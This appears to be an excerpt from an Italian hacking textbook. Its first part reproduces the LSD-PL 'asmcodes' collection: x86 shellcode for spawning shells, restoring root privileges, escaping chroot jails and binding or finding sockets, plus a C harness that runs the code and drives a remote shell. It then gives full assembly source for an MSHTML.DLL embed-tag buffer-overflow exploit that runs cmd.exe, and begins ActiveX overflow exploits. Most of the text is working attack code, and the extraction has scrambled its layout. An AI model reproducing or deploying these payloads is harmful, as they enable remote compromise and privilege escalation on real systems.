"\x89\xe3"
"\x50"
"\x66\x68""-c"
"\x89\xe7"
"\x50"
"\x51"
"\x57"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"
"\xe8\xd9\xff\xff\xff"
/* command */
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

40+cmdlen bytes
jmp
<cmdshellcode+36>
popl
%ecx
xorl
%eax,%eax
pushl
%eax
pushl
$0x68732f2f
pushl
$0x6e69622f
movl
%esp,%ebx
pushl
%eax
pushw
$0x632d
movl
%esp,%edi
pushl
%eax
pushl
%ecx
pushl
%edi
pushl
%ebx
movl
%esp,%ecx
cdql
movb
$0x0b,%al
int
$0x80
call
<cmdshellcode+2>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char setuidcode[]=
"\x33\xc0"
"\x31\xdb"
"\xb0\x17"
"\xcd\x80"
;

/*
/*
/*
/*
/*

8 bytes
xorl
xorl
movb
int

*/
*/
*/
*/
*/

char chrootcode[]=
"\x33\xc0"
"\x50"
"\x68""bb.."
"\x89\xe3"
"\x43"
"\x33\xc9"
"\xb0\x27"
"\xcd\x80"
"\x33\xc0"
"\xb0\x3d"
"\xcd\x80"
"\x43"
"\xb1\xff"
"\xb0\x0c"
"\xcd\x80"
"\xe2\xfa"
"\x43"
"\xb0\x3d"
"\xcd\x80"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

37 bytes
xorl
%eax,%eax
pushl
%eax
pushl
$0x2e2e6262
movl
%esp,%ebx
incl
%ebx
xorl
%ecx,%ecx
movb
$0x27,%al
int
$0x80
xorl
%eax,%eax
movb
$0x3d,%al
int
$0x80
incl
%ebx
movb
$0xff,%cl
movb
$0x0c,%al
int
$0x80
loop
<chrootcode+21>
incl
%ebx
movb
$0x3d,%al
int
$0x80

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char findsckcode[]=
"\x31\xdb"
"\x89\xe7"
"\x8d\x77\x10"
"\x89\x77\x04"
"\x8d\x4f\x20"
"\x89\x4f\x08"
"\xb3\x10"
"\x89\x19"
"\x31\xc9"
"\xb1\xff"
"\x89\x0f"
"\x51"
"\x31\xc0"
"\xb0\x66"
"\xb3\x07"
"\x89\xf9"
"\xcd\x80"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

72 bytes
xorl
%ebx,%ebx
movl
%esp,%edi
leal
0x10(%edi),%esi
movl
%esi,0x4(%edi)
leal
0x20(%edi),%ecx
movl
%ecx,0x8(%edi)
movb
$0x10,%bl
movl
%ebx,(%ecx)
xorl
%ecx,%ecx
movb
$0xff,%cl
movl
%ecx,(%edi)
pushl
%ecx
xorl
%eax,%eax
movb
$0x66,%al
movb
$0x07,%bl
movl
%edi,%ecx
int
$0x80

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"

%ebx
%esp,%ecx

%eax,%eax
%ebx,%ebx
$0x17,%al
$0x80



"\x59"
"\x31\xdb"
"\x39\xd8"
"\x75\x0a"
"\x66\xb8\x12\x34"
"\x66\x39\x46\x02"
"\x74\x02"
"\xe2\xe0"
"\x89\xcb"
"\x31\xc9"
"\xb1\x03"
"\x31\xc0"
"\xb0\x3f"
"\x49"
"\xcd\x80"
"\x41"
"\xe2\xf6"

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

popl
xorl
cmpl
jne
movw
cmpw
je
loop
movl
xorl
movb
xorl
movb
decl
int
incl
loop

%ecx
%ebx,%ebx
%ebx,%eax
<findsckcode+54>
$0x1234,%bx
%bx,0x2(%esi)
<findsckcode+56>
<findsckcode+24>
%ecx,%ebx
%ecx,%ecx
$0x03,%cl
%eax,%eax
$0x3f,%al
%ecx
$0x80
%ecx
<findsckcode+62>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char bindsckcode[]=
"\x33\xc0"
"\x50"
"\x68\xff\x02\x12\x34"
"\x89\xe7"
"\x50"
"\x6a\x01"
"\x6a\x02"
"\x89\xe1"
"\xb0\x66"
"\x31\xdb"
"\x43"
"\xcd\x80"
"\x6a\x10"
"\x57"
"\x50"
"\x89\xe1"
"\xb0\x66"
"\x43"
"\xcd\x80"
"\xb0\x66"
"\xb3\x04"
"\x89\x44\x24\x04"
"\xcd\x80"
"\x33\xc0"
"\x83\xc4\x0c"
"\x50"
"\x50"
"\xb0\x66"
"\x43"
"\xcd\x80"
"\x89\xc3"
"\x31\xc9"
"\xb1\x03"
"\x31\xc0"
"\xb0\x3f"
"\x49"
"\xcd\x80"
"\x41"
"\xe2\xf6"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

73 bytes
xorl
%eax,%eax
pushl
%eax
pushl
$0x341202ff
movl
%esp,%edi
pushl
%eax
pushb
$0x01
pushb
$0x02
movl
%esp,%ecx
movb
$0x66,%al
xorl
%ebx,%ebx
incl
%ebx
int
$0x80
pushb
$0x10
pushl
%edi
pushl
%eax
movl
%esp,%ecx
movb
$0x66,%al
incl
%ebx
int
$0x80
movb
$0x66,%al
movb
$0x04,%bl
movl
%eax,0x4(%esp)
int
$0x80
xorl
%eax,%eax
addl
$0x0c,%esp
pushl
%eax
pushl
%eax
movb
$0x66,%al
incl
%ebx
int
$0x80
movl
%eax,%ebx
xorl
%ecx,%ecx
movb
$0x03,%cl
xorl
%eax,%eax
movb
$0x3f,%al
decl
%ecx
int
$0x80
incl
%ecx
loop
<bindsckcode+63>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

#define FINDSCKPORTOFS
#define BINDSCKPORTOFS

46
06

#endif

BeOS/x86 codes, file: x86-beos


/*
syscall
----------execv
execv
*/

%eax
---x03f
x03f

stack
--------------------------------------------------------------ret,anum=1,->[->path="/bin//sh"],0
ret,anum=3,->[->path="/bin//sh",->a1="-c",->a2=cmd],0

#if defined(X86) && defined(BEOS)


char shellcode[]=
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x54"
"\x89\xe3"
"\x50"
"\x53"
"\x6a\x01"
"\x50"
"\xb0\xa2"
"\xcd\x25"
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

25 bytes
xorl
%eax,%eax
pushl
%eax
pushl
$0x68732f2f
pushl
$0x6e69622f
pushl
%esp
movl
%esp,%ebx
pushl
%eax
pushl
%ebx
pushb
$0x01
pushl
%eax
movb
$0xa2,%al
int
$0x25

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char cmdshellcode[]=
"\xeb\x25"
"\x59"
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x66\x68""-c"
"\x89\xe7"
"\x51"
"\x57"
"\x53"
"\x89\xe3"
"\x50"
"\x53"
"\x6a\x03"
"\x50"
"\xb0\xa2"
"\xcd\x25"
"\xe8\xd6\xff\xff\xff"
/* command */
;

/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

44+cmdlen bytes
jmp
<cmdshellcode+39>
popl
%ecx
xorl
%eax,%eax
pushl
%eax
pushl
$0x68732f2f
pushl
$0x6e69622f
movl
%esp,%ebx
pushl
%eax
pushw
$0x632d
movl
%esp,%edi
pushl
%ecx
pushl
%edi
pushl
%ebx
movl
%esp,%ebx
pushl
%eax
pushl
%ebx
pushb
$0x03
pushl
%eax
movb
$0xa2,%al
int
$0x25
call
<cmdshellcode+2>

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

char jump[]=
"\x8b\xc4"
"\xc3"
;

/* movl
/* ret

%esp,%eax

*/
*/

#endif

Programma d'esempio legato all'uso dei codici


K.1 asmcodes.h
#ifndef ASMCODES_H
#define ASMCODES_H
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

"mips-irix"
"sparc-solaris"
"parisc-hpux"
"powerpc-aix"
"alpha-ultrix"
"x86-beos"
"x86-bsd"
"x86-linux"
"x86-solaris"
"x86-sco"

typedef struct{char *n;char *c;}asmcodes_t[9];


asmcodes_t asmcodes={
#if defined(AIX) || ( defined(X86) && ( defined(SOLARIS) || defined(SCO) ) )
{ "syscallcode",
syscallcode },
#else
{ "",
NULL
},
#endif



{ "shellcode",
shellcode
},
{ "cmdshellcode", cmdshellcode },
#if !defined(BEOS) && !defined(ULTRIX)
#if defined(SOLARIS) || defined(SCO) || defined(LINUX) || defined(BSD)
{ "setuidcode",
setuidcode
},
#endif
#if defined(HPUX)
{ "setresuidcode", setresuidcode },
#endif
#if defined(IRIX) || defined(AIX)
{ "setreuidcode", setreuidcode },
#endif
{ "chrootcode",
chrootcode
},
#if !defined(OPENSERVER)
{ "findsckcode",
findsckcode
},
#else
{ "",
NULL
},
#endif
#if !defined(SCO)
{ "bindsckcode",
bindsckcode
}
#else
{ "",
NULL
},
#endif
#else
{ "",
NULL
},
{ "",
NULL
},
{ "",
NULL
},
{ "",
NULL
}
#endif
};
#if defined(BEOS) || defined(ULTRIX)
#define FINDSCKPORTOFS
-1
#define BINDSCKPORTOFS
-1
#define usleep(a) sleep(1)
#endif
#define is(flag)
(flags&(1<<flag))
#define block(flag) (flags&(1<<flag))
#define code(flag) asmcodes[flag].c
#define
#define
#define
#define
#define
#define
#define

SYSCALL
SHELL
CMD
CRED
CHROOT
FIND
BIND

0
1
2
3
4
5
6

#define _REMOTE 9
typedef struct{char state;char *follow;int flag;}pblock_t[4];
pblock_t tab={
{ 'P', "CSRFB",
{ 'R', "CSFB" ,
{ 'F', "CS"
,
{ 'B', "CS"
,
};

(1<<CRED)
(1<<CHROOT)
(1<<FIND)|(1<<_REMOTE)
(1<<BIND)|(1<<_REMOTE)

},
},
},
}

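/*
 * Parse the -b block specification (e.g. "PRFS") into a flag bitmask.
 *
 * Each character except the last must be one of the states in tab[]
 * ('P', 'R', 'F', 'B'); it contributes tab[i].flag, and the character that
 * follows it must be listed in tab[i].follow, which is how the allowed
 * block orderings are enforced. The final character must be 'S' (sets
 * 1<<SHELL) or 'C' (sets 1<<CMD).
 *
 * b: NUL-terminated specification string (the getopt argument).
 * Returns the OR of the selected block flags, or -1 when b is NULL or
 * empty, contains an unknown block letter, an illegal letter sequence,
 * or does not end in 'S' or 'C'.
 */
int parseblocks(char *b){
  char c;int i,flag=0;
  if(b==NULL) return(-1);          /* the original dereferenced b unconditionally */
  /* c is the current letter, *b the one that follows it; the last letter
   * is left in c for the S/C check below */
  while((c=*b++)&&*b){
    for(i=0;i<4;i++) if(c==tab[i].state) break;
    if(i==4) return(-1);           /* not a prefix block */
    if(strchr(tab[i].follow,*b)==NULL) return(-1); /* successor not allowed here */
    flag|=tab[i].flag;
  }
  if(c=='S') flag|=(1<<SHELL);
  else if(c=='C') flag|=(1<<CMD);
  else return(-1);                 /* also covers the empty string (c=='\0') */
  return(flag);
}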
#endif



K.2 asmcodes.c
/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland
/*## unix asmcodes testing facility
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*
/*

*://lsd-pl.net/ #*/
#*/

this code provides the capability of testing different assembly code


blocks in proof of concept codes
compilation:
(g)cc asmcodes.c -DSYSTEM -DPROCESSOR [-DVERSION] [-lnsl -lsocket]
platforms:
files:
-DIRIX
-DMIPS
; mips-irix
-DSOLARIS
-DSPARC
; sparc-solaris
-DHPUX
-DPARISC
; parisc-hpux
-DAIX
-DPOWERPC -DV41|-DV42|-DV43
; powerpc-aix
-DULTRIX
-DALPHA
; alpha-ultrix
-DSOLARIS
-DX86
; x86-solaris
-DBEOS
-DX86
; x86-beos
-DLINUX
-DX86
; x86-linux
-DOPENBSD
-DX86
; x86-bsd
-DFREEBSD
-DX86
; x86-bsd
-DNETBSD
-DX86
; x86-bsd
-DOPENSERVER -DX86
; x86-sco
-DUNIXWARE
-DX86
; x86-sco

*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/
*/

#include <sys/types.h>
#include <sys/socket.h>
#if defined(AIX)
#include <sys/select.h>
#endif
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include "_asmcodes.h"
int main(int argc,char **argv){
char buffer[1024],*b,*cmd="id";
int i,c,n,flags=-1,port=1234,sck;
struct hostent *hp;
struct sockaddr_in adr;
printf("copyright LAST STAGE OF DELIRIUM feb 2001 poland
printf("unix asmcodes testing facility\n\n");

//lsd-pl.net/\n");

while((c=getopt(argc,argv,"b:c:p:"))!=-1){
switch(c){
case 'b': flags=parseblocks(optarg);break;
case 'c': cmd=optarg;break;
case 'p': port=atoi(optarg);break;
}
}
if(flags==-1){
printf("usage: %s -b buffer [-p port] [-c \"cmd\"]\n%s",argv[0],
" where the buffer is composed of one of the following blocks:\n"
" S interactive shell\n"
" C single command (-c \"cmd\", or predefined \"id\")\n"
" P restore privileges\n"
" R escape chroot jail\n"
" F find socket (-p port, or default=1234)\n"
" B bind socket (same as for F)\n\n"
" valid blocks combinations:\n"
" S PS RS PRS FS BS PFS PBS RFS RBS PRFS PRBS\n"
" C PC RC PRC FC BC PFC PBC RFC RBC PRFC PRBC\n\n"
" blocks implemented on this platform:\n "
);
for(i=1;i<9;i++) printf("%s ",asmcodes[i].n?asmcodes[i].n:"");
printf("\n\n example: %s -b PRFS -p 1112\n",argv[0]);
exit(-1);
}
/*



* if the find or bind codes are to be tested run simple network daemon
* simulating a vulnerable application. the simulation is done by the means
* of reading an instruction stream from the network and then executing it.
*/
if(is(_REMOTE)){
if(!fork()){
sck=socket(AF_INET,SOCK_STREAM,0);
adr.sin_family=AF_INET;
adr.sin_port=htons(port);
adr.sin_addr.s_addr=htonl(INADDR_ANY);
i=1;
setsockopt(sck,SOL_SOCKET,SO_REUSEADDR,(void*)&i,sizeof(i));
if(bind(sck,(struct sockaddr*)&adr,sizeof(struct sockaddr_in))<0){
perror("error");exit(-1);
}
listen(sck,1);
if((i=accept(sck,(struct sockaddr*)0,(int*)0))==-1) exit(-1);
close(sck);sck=i;
read(sck,buffer,sizeof(buffer));
usleep(500000);
if(block(BIND)) close(sck);
#if defined(AIX)
{
int jump[2]={(int)buffer,*((int*)&main+1)};
sleep(1);
((*(void (*)())jump)());
}
#else
usleep(100000);
((*(void (*)())buffer)());
#endif
exit(-1);
}
sleep(1);
}
/*
* if this is remote code test, connect to the remote server, which
* simulates vulnerable aplication.
*/
if(is(_REMOTE)){
sck=socket(AF_INET,SOCK_STREAM,0);
adr.sin_family=AF_INET;
adr.sin_port=htons(port);
if((adr.sin_addr.s_addr=inet_addr("127.0.0.1"))==-1){
if((hp=gethostbyname("127.0.0.1"))==NULL){
errno=EADDRNOTAVAIL;perror("error");exit(-1);
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
if(connect(sck,(struct sockaddr*)&adr,sizeof(struct sockaddr_in))<0){
perror("error");exit(-1);
}
}
/*
* separate code pieces are combined into one block in the target buffer.
* for the findsckcode the local port of the connection established with
* a "vulnerable" server must be obtained. for bindsckcode the number
* of port to which the listening socket is to be bound must be specified.
*/
b=buffer;
if(code(SYSCALL)!=NULL){
for(i=0;i<strlen(code(SYSCALL));i++) *b++=code(SYSCALL)[i];
}
if(block(CRED)){
for(i=0;i<strlen(code(CRED));i++) *b++=code(CRED)[i];
}
if(block(CHROOT)){
for(i=0;i<strlen(code(CHROOT));i++) *b++=code(CHROOT)[i];
}
if(block(FIND)){
i=sizeof(struct sockaddr_in);
if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
struct{unsigned int maxlen;unsigned int len;char *buf;}nb;
ioctl(sck,(('S'<<8)|2),"sockmod");



nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck,(('T'<<8)|144),&nb);
}
n=ntohs(adr.sin_port);
code(FIND)[FINDSCKPORTOFS+0]=(unsigned char)((n>>8)&0xff);
code(FIND)[FINDSCKPORTOFS+1]=(unsigned char)(n&0xff);
for(i=0;i<strlen(code(FIND));i++) *b++=code(FIND)[i];

}
if(block(BIND)){
n=port;
code(BIND)[BINDSCKPORTOFS+0]=(unsigned char)((n>>8)&0xff);
code(BIND)[BINDSCKPORTOFS+1]=(unsigned char)(n&0xff);
for(i=0;i<strlen(code(BIND));i++) *b++=code(BIND)[i];
}
if(block(SHELL)){
for(i=0;i<strlen(code(SHELL));i++) *b++=code(SHELL)[i];
}
if(block(CMD)){
for(i=0;i<strlen(code(CMD));i++) *b++=code(CMD)[i];
for(i=0;i<strlen(cmd);i++) *b++=cmd[i];
}
*b=0;

/*
* the portion of code simulating a "vulnerability" in a program, which
* is to be exploited locally
*/
if(!is(_REMOTE)){
#if defined(AIX)
{
int jump[2]={(int)&buffer,*((int*)&main+1)};
sleep(1);
((*(void (*)())jump)());
}
#else
#if defined(ULTRIX)
((*(void (*)())(unsigned long long)strdup(buffer))());
#else
usleep(100000);
((*(void (*)())buffer)());
#endif
#endif
exit(-1);
}
/*
* for remote test, send buffer via network socket to a simple daemon.
* do bind reconnection whereas needed. if remote shell gets executed,
* read commands from user, feed them to the shell and show their results.
*/
write(sck,buffer,strlen(buffer)+1);
if(block(BIND)){
close(sck);
sleep(2);
sck=socket(AF_INET,SOCK_STREAM,0);
adr.sin_port=htons(n);
if(connect(sck,(struct sockaddr*)&adr,sizeof(struct sockaddr_in))<0){
perror("error");exit(-1);
}
}
if(block(FIND)){
sleep(1);
}
write(sck,"uname -a\n",9);
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){



if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck,buf,cnt);

}
if(FD_ISSET(sck,&fds)){
if((cnt=read(sck,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}

}
}

exit(0);

Buffer Overflow in MSHTML.DLL


Indovinate dove si trova un buffer overflow?
Dentro alla DLL che gestisce l'interprete Microsoft di HTML, ovvero la DLL MSHTML.DLL.
In altre parole, se viene fornito all'interprete uno statement del tipo:
<embed src="filename.AAAAAAAAAA<un certo numero di 'A'>">
l'indirizzo di ritorno viene sovrascritto dalla traduzione in UNICODE di AAAA, ovvero
0x41004100.
Il buffer overflow avviene quando l'interprete cerca di concatenare l'estensione del file con
"Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappingOverride\"

tramite la funzione C wcscat().


Esiste un altro problema nel sistema di validazione, e precisamente in quello che controlla se
esiste un'estensione.
Esistono comunque tre problemi specifici nella scrittura dell'exploit, e precisamente:
1. Tutti i dati vengono convertiti in UNICODE, cioè le A vengono convertite in 0x0041.
2. L'indirizzo dello shell code potrebbe essere differente in base al numero di finestre aperte.
3. Ci sono differenti offset degli EIP salvati all'interno dello stack a seconda che la versione di Internet
Explorer sia precedente o posteriore alla IE5.5SP2.
Il primo problema ce lo insegna a bypassare CodeRed: è sufficiente passare lo shell
code già in UNICODE per evitare la routine di conversione.
Il secondo problema è bypassabile facendo sì che l'indirizzo che andiamo a sovrascrivere sia di
fatto quello di una routine presente in una DLL in memoria, da cui sarà possibile saltare indietro
mediante EBP o ESP.
Abbiamo trovato un'istruzione "jmp esp" (FFE4) in tutte le versioni di kernel32.dll e anche
dentro ad una versione di msvcrt.dll (6.10.8924.0).
Questa versione di DLL non dipende da Internet Explorer ed è presente in qualsiasi
installazione Windows.
Il terzo problema è possibile bypassarlo mediante la sovrascrittura dei vari EIP salvati nello
stack, usando un certo numero di NOP e

call xxxx
...
xxxx:
pop ebp



Se vi ricordate, quando abbiamo parlato dei buffer overflow uno dei problemi era quello dato
dalla presenza di byte 0.
Qui non dobbiamo preoccuparci, in quanto il tutto è già fornito come UNICODE.
Qui di seguito è riportato uno shell code con degli effetti visuali.

;
;
;
;
;
;
;
;
;
;
;
;
;
;
;
;
;
;
;
;
;
;
;
;

matrix.asm - source code for matrix.htm


build:
tasm matrix.asm /m2
tlink matrix.obj, matrix.htm /t /3
Authors:
ERROR: bug discovery
3APA3A: idea and coding
OFFliner: matrix effects and undocumented Windows API
Thanx to Andrey Kolishak for indirect esp jump idea
you can obtain matrix screensaver from
http://www.security.nnov.ru/matrix
eipjmp: overwrites saved EIP for all versions of
mshtml.dll
espjmp: gets control after jmp esp and calls code1
code1: restores EIP from stack after call to ebp
does some actions and jumps to code2
code2: does the rest of actions

datap equ (DataTable+080h)


hKernel32 equ LoadL-datap
cCur equ StringTable-datap
SetCCH equ StringTable+4-datap
GetSH equ StringTable+8-datap
Sleep equ StringTable+12-datap
WriteC equ StringTable+16-datap
AllocC equ StringTable+20-datap
SetCDM equ StringTable+24-datap
SetCTA equ StringTable+28-datap
SetCCI equ StringTable+32-datap
WinE equ StringTable+36-datap
ExitP equ StringTable+40-datap
hStdOut equ StringTable+48-datap
dwOldMode equ cCur
conCur equ StringTable+52-datap
cls equ StringTable+56-datap
DWNumChar equ StringTable+60-datap
RegHK equ user-datap
386
_faked segment para public 'CODE' use32
assume cs:_faked
start:
_faked ends
_main segment para public 'DATA' use32
assume cs:_main



prefix:

begin db 0ffh,0feh ;Unicode prefix


db "<",0,"e",0,"m",0,"b",0,"e",0,"d",0,0dh,0
db "s",0,"r",0,"c",0,"=",0,34,0
db "h",0,"t",0,"t",0,"p",0,":",0,"/",0,"/",0
db "w",0,"w",0,"w",0,".",0
db
"s",0,"e",0,"c",0,"u",0,"r",0,"i",0,"t",0,"y",0,".",0
db "n",0,"n",0,"o",0,"v",0,".",0,"r",0,"u",0
db "/",0,"f",0,"i",0,"l",0,"e",0,"s",0,"/",0
db "i",0,"e",0,"b",0,"o",0,"/",0,"X",0
db "!(c)3APA3A"
db 22 dup(090h)
code1:
pop ebp
mov esp,ebx
xor eax,eax
dataoffset = DataTable - code2
ebpdiff = 80h + dataoffset
mov ax,ebpdiff
add ebp,eax ;ebp points to data
lea eax,[ebp+user-datap]
push eax
mov ebx,[ebp+LoadL-datap]
mov eax,[ebx]
mov [ebp+LoadL-datap],eax
call eax ;LoadLibraryA("user32.dll")
lea ebx,[ebp+reg-datap]
push ebx
push eax
mov ebx,[ebp+GetPA-datap]
mov eax,[ebx]
mov [ebp+GetPA-datap],eax
call eax ;GetProcAddress(.,"RegisterHotKey")
mov [ebp+RegHK],eax
lea edi,[ebp+rhk-datap]
movzx esi,byte ptr[edi]
LoopHotkey:
inc edi
xor eax,eax
mov al,[edi]
push eax
inc edi
mov al,[edi]
push eax
inc edi
mov al,[edi]
push eax
xor eax,eax
push eax
call [ebp+RegHK]
dec esi
or esi,esi
jnz LoopHotKey
lea eax,[ebp+StringTable-datap] ;string "kernel32.dll"
push eax
call [ebp+LoadL-datap] ;LoadLibraryA("kernel32.dll")
mov [ebp+hKernel32],eax ;hKernel32 =



lea eax, [ebp+SetCCH]
mov [ebp+cCur],eax ;*cCur = SetCCH
lea edi,[ebp+funcnum-datap]
movzx esi,byte ptr[edi] ;esi=funcnum
inc edi
LoopResolve:
push edi
push dword ptr [ebp+Hkernel32]
call [ebp+GetPA-datap] ;GetProcAddress(edi)
mov ebx,[ebp+cCur]
mov [ebx],eax ;save func address
xor ecx,ecx
mov cl,4
add ebx,ecx
mov [ebp+cCur],ebx ;cCur+=4
not ecx
xor eax,eax
repnz scasb ;find \0
dec esi
or esi,esi
jnz LoopResolve

call [ebp+AllocC] ;AllocConsole()


push eax ;nonzero if succeed
xor eax,eax
push eax
call [ebp+SetCCH] ;SetConsoleCtrlHandler(NULL,TRUE)
xor eax,eax
not eax
sub al,0Ah
push eax
call [ebp+GetSH] ;GetStdHandle(STD_OUTPUT_HANDLE)
mov [ebp+hStdOut],eax ;hStdOut=
lea eax,[ebp+dwOldMode]
push eax
xor ebx,ebx
inc ebx
push ebx
push dword ptr [ebp+hStdOut]
call [ebp+SetCDM] ;SetConsoleDisplayMode(hStdOut, 1,
&dwOldMode)
xor ebx,ebx
mov bl,0Ah
push ebx
push dword ptr [ebp+hStdOut]
call [ebp+SetCTA]
;SetConsoleTextAttribute(hStdOut,FOREGROUND_INTENSITY|
FOREGROUND_GREEN)
xor ebx,ebx
mov [ebp+ConCur+4],ebx ;ConCur.bVisible = 100
mov bl, 100
mov [ebp+ConCur],ebx ;ConCur.dwSize = 0
lea eax, [ebp+ConCur]
push eax
push dword ptr [ebp+hStdOut]
call [ebp+SetCCI] ;SetConsoleCursorInfo(hstdOut,&ConCur)
xor eax,eax
mov ax,1000
push eax
call[ebp+Sleep] ;Sleep(1000);



xor ebx,ebx
mov bl, string-datap
mov eax,ebp
add eax,ebx
mov [ebp+cCur],eax ;cCur = string
mov eax,ebp
mov bx,datap-empty_string
sub eax,ebx
mov [ebp+cls],eax ;set address of empty_string
LOOP1: ;do do
xor eax,eax
push eax
lea ebx,[ebp+DWNumChar]
push ebx
inc eax
push eax
mov eax,[ebp+cCur]
push eax
push dword ptr [ebp+hStdOut]
call [ebp+WriteC]
;WriteConsole(hStdOut,(void*)cCur,1,&DWNumChar,NULL);
xor eax,eax
mov al,100
mov ecx,[ebp+cCur]
mov bl,[ecx]
sub bl,20
jnz N1
mov ax,400
N1: mov bl,[ecx]
sub bl,8
jnz N2
mov ax,2100
N2: push eax
call [ebp+Sleep] ;Sleep((*cCur==' ')?400:(*cCur=='\b')?
2100:100)
mov ecx,[ebp+cCur]
inc ecx
mov [ebp+cCur],ecx ;++cCur
mov bl,[ecx]
sub bl,9
jnz LOOP1 ;while(*cCur!='\t');
call [ebp+cls]
mov ecx,[ebp+cCur]
inc ecx
mov [ebp+cCur],ecx ;++cCur
mov bl,[ecx]
sub bl,00Ah
jnz LOOP1 ;while(*cCur!='\n');
inc ecx
xor eax,eax
push eax
lea ebx,[ebp+DWNumChar]
push ebx
mov al,18
push eax
push ecx
push dword ptr [ebp+hStdOut]
jmp code2

codelength = $ - begin



neednoops = 1d4h - codelength
db neednoops dup(090h)
eipjmp:
dd
dd
dd
dd
dw
dd

78024e02h
78024e02h
78024e02h
78024e02h
9090h
78024e02h ;EIP for IE < 55SP2

espjmp:
db 18 dup(090h)
xor eax,eax ;ESP comes here
mov ax,0170h
mov ebx,esp
sub ebx,eax
call ebx
code2:

call [ebp+WriteC]
xor eax,eax
mov ax,4000
push eax
call [ebp+Sleep]
call [ebp+cls]
lea eax,[ebp+cmdexe-datap]
push eax
push eax
call [ebp+WinE]
xor eax,eax
push eax
call [ebp+ExitP]

empty_string:
; some code can be pasted here
xor eax,eax
mov ax,1000
push eax
call [ebp+Sleep] ;Sleep(1000)
xor eax,eax
push eax
lea ebx,[ebp+DWNumChar]
push ebx
mov al,30
push eax
lea eax,[ebp+empty-datap]
push eax
push dword ptr [ebp+hStdOut]
call [ebp+WriteC]
ret

DataTable:
LoadL dd 780330d0h ;LoadLibraryA import table entry
GetPA dd 780330cch ;GetProcAddress import table entry



StringTable:
db "kernel32.dll",0
funcnum db 10
db "SetConsoleCtrlHandler",0
db "GetStdHandle",0
db "Sleep",0
db "WriteConsoleA",0
db "AllocConsole",0
db "SetConsoleDisplayMode",0
db "SetConsoleTextAttribute",0
db "SetConsoleCursorInfo",0
db "WinExec",0
db "ExitProcess",0
user db "user32.dll",0
reg db "RegisterHotKey",0
cmdexe db "cmd.exe",0
rhk db 5
db 9,1,100,01bh,1,101,13,1,102,05dh,8,103,3,2,104
empty db 00dh,28 dup(020h),00dh,0
string db 00dh," Wake Up, Neo...",00dh,009h,0
db 00dh," The Matrix has you...",00dh,009h,0
db 00dh," Follow the White
Rabbit.",00dh,008h,009h,00ah,0
db 00dh," Knock, knock...",00dh,0
padding db 32
suffix:

db 34,0,">",0,00ah
copy db "(c) 2002 by 3APA3A, ERRor, OFFLiner"

_main ends
end start

Buffers Overflow a vari componenti di Windows


Esistono diversi OCX in ambiente WINDOWS che possiedono dei bugs che li rendono
suscettibili di buffer overflow.
Acrobat Control for ActiveX - PDF.OCX (v1.3.188)
Setupctl 1.0 Type Library - SETUPCTL.DLL (v1, 1, 0, 6)
EYEDOG OLE Control module - EYEDOG.OCX (v1.1.1.75)
MSN ActiveX Setup BBS Control - SETUPBBS.OCX (v4.71.0.10)
hhopen OLE Control Module - HHOPEN.OCX (v1, 0, 0, 1)
RegWizCtrl 1.0 Type Library - REGWIZC.DLL (v3, 0, 0, 0)
I vari exploits sono relativi a codici HTML, quindi fate vuoi a fantasia.
Negli esempi qello che si esegue il solito calcolatore.
PDF
<object classid="clsid:CA8A9780-280D-11CF-A24D-444553540000"
id="pdf"></object>
<script language="VBscript"><!-msgbox("Adobe Acrobat OCX Buffer Overrun" + Chr(10) + "Written by Shane
Hird")



expstr =
